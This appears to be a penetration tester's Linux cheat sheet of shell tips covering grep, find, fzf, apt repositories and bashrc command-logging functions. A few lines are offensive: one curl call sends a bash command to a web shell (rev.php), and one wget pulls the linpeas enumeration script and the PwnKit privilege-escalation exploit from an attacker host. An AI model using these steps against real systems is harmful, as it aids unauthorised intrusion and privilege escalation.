Linux

Download Linux Image

Interactive SSH Prompt

~C
# brings ssh> which can be used for port forwarding ( Only after obtaining a shell)

URL Encode via curl

  • URL Encode the values requested via curl
curl -G http://url/rev.php --data-urlencode "cmd=/bin/bash -c 'whoami'"

Wget

  • Wget multiple files with bash expansions
wget http://10.10.14.29/{linpeas.sh,PwnKit}

Chmod

  • Chmod multiple files
# files need to be chmod +x linpeas.sh and PwnKit
chmod +x [lP]*

Grep

  • Avoid multiple patterns in a file
egrep -v '(str1|str2)'
  • Grep Multiple Contents
grep -EInRi --color=always '(str1 | str2)'
  • Keep the grep highlighted color when piping the output
grep --color=always dnoscp whoami.txt | more

Find

  • Exclude specific directories from the find command
find / -writable ! -path '/proc/*' 2>/dev/null
  • Find files with multiple extensions
find . -type f \( -name "*.txt" -o -name "*.xml" \)

fzf

  • Install fzf
sudo apt install fzf
  • Make fzf to interpret the colors
grep --color=always dnoscp whoami.txt | fzf --ansi

Files

  • Know the files location of the services without installing the application
sudo apt install apt-file
apt-file search tomcat # brings all the files related to tomcat (or) the files that contains the string tomcat in its file name
tomcat-users.xml default location

apt

  • Change the default repository for higher speed
# File: /etc/apt/sources.list
# From: deb http://http.kali.org/kali kali-rolling main contrib non-free
# To: deb http://kali.download/kali kali-rolling main contrib non-free
┌──(dnoscp㉿friday)-[~]
└─$ cat /etc/apt/sources.list
# See https://www.kali.org/docs/general-use/kali-linux-sources-list-repositories/
# deb http://http.kali.org/kali kali-rolling main contrib non-free
deb http://kali.download/kali kali-rolling main contrib non-free
# Additional line for source packages
# deb-src http://http.kali.org/kali kali-rolling main contrib non-free
  • Know the version of the application installed from apt with apt-cache policy <packageName>
➜ dhanesh's-device apt-cache policy sudo
sudo:
Installed: 1.8.31-1ubuntu1.2
Candidate: 1.8.31-1ubuntu1.2
Version table:
*** 1.8.31-1ubuntu1.2 500
500 http://in.archive.ubuntu.com/ubuntu focal-updates/main amd64 Packages
500 http://security.ubuntu.com/ubuntu focal-security/main amd64 Packages
100 /var/lib/dpkg/status
1.8.31-1ubuntu1 500
500 http://in.archive.ubuntu.com/ubuntu focal/main amd64 Packages
500 http://archive.ubuntu.com/ubuntu focal/main amd64 Packages
  • Add Kali Linuxreleases in ubuntu (
    Might be slow when installing stuff and also unaware the stability)
# sign the kali release
wget -q -O - https://archive.kali.org/archive-key.asc | apt-key add
# add the repo
echo "deb http://kali.download/kali kali-rolling main contrib non-free" | sudo tee -a /etc/apt/sources.list
sudo apt update

Log things you have installed

  • Add the following function in the .bashrc file
install(){
echo "sudo apt install -y $@" | tee -a ~/commands.txt && cat ~/commands.txt | tail -1 | bash
}
# OR
install(){
# installation part
TOOL=$@
INSTALL="sudo apt install -y $TOOL"
echo $INSTALL | bash
ISTATUS=$?
# logging part
if [ $ISTATUS == "0" ]; then
echo "sudo apt install -y $TOOL" >> ~/commands/install.txt
else
echo "[-] Installation Error: $TOOL" >> ~/commands/failed.txt
fi
}
  • Source the file and install new contents with install <packageName> (install xclip)
  • All the installed commands will be available in the ~/install.txt

Log only commands that executed successfully

  • Add the following in the .bashrc file
a(){
cmd=$@
echo $cmd | bash 2>/dev/null
exit=$?
if [ $exit == "0" ]; then
echo "$cmd" >> ~/successcommands.txt
else
echo "[+] No command found: $cmd"
fi
}
  • Execute commands with a <command> (a whoami)
  • Only the commands with the successful status code will be logged in the ~/successcommands.txt file

Date

  • Date format with full date and time: date +%F:%T (Mostly used with somecommand | tee $(date +%F:%T).log)